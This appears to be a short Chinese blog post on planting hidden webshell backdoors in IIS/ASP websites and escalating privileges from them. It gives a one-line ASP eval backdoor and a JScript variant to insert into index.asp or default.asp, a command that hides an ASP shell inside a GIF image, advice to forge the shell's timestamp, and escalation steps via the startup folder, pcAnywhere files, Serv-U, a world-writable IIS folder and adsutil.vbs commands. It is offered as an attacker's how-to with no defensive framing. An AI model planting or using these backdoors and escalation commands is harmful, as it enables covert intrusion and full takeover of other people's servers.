暗藏webshell后门
1.插一句木马后门,在index.asp或者default.asp在最底部或者中间加入
<% eval request ("pass") %>有时候会出错测在后门代码处理为
<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>try {eval(Request.from('pass')+'')}
catch(e) {} </SCRIPT>
2.修改webshell时间(asp木马时间修改器)
3.图片留后门
copy /b 1.asp+ 1.gif asp.asp
webshell提权
1.系统启动项提权
1)C:\documents and setting\all user\开始\菜单\程序\启动
2.PCanywhere连接提权
1)C:\documents and setting\all user\AppData\symantec\pcanywhere找到扩展名为cif
3.serv-U提权
4.erveryone完全控制木马运行
c:\windows\system32\inetsrv\data目录通常是erveryone完全控制权限。把提升权限的工具
放在这里就ok
5.adsutil.vbs提权
1)查看C:\inetpub\adminscript\下面有木有“adsutil.vbs”如果有可利用它提权
csctipt c:\inetpub\adminscripts\adsutil.vbs get w3svc/inprocessisapiapps
2)特权的dll文件存在没有,如idq.dll,httpext.dll,httpodbc.dll,ssinc.dll和msw3prt.dll
如果存在文件将asp.asp加入特权组,使用webshell获得最高控制权限
cscript adsutil.vbs set /w3svc/inprocessisapiapps
"c:\windows\system32\idq.dll"
"c:\windows\system32\inetsrv\httpext.dll"
"c:\windows\system32\inetsrv\httpodbc.dll"
"c:\windows\system32\inetsrv\ssinc.dll"
"c:\windows\system32\msw3prt.dll"
"c:\windows\system32\inetsrv\asp.dll"
3)完成后,可以用命令查提权成功木有
cscript adsutil.vbs get w3svc/inprocessisapiapps
webshell提权
原创
©著作权归作者所有:来自51CTO博客作者firehalt的原创作品,请联系作者获取转载授权,否则将追究法律责任
上一篇:无法检测与删除的后门
下一篇:51cto注入漏洞
提问和评论都可以,用心的回复会被更多人看到
评论
发布评论
相关文章
















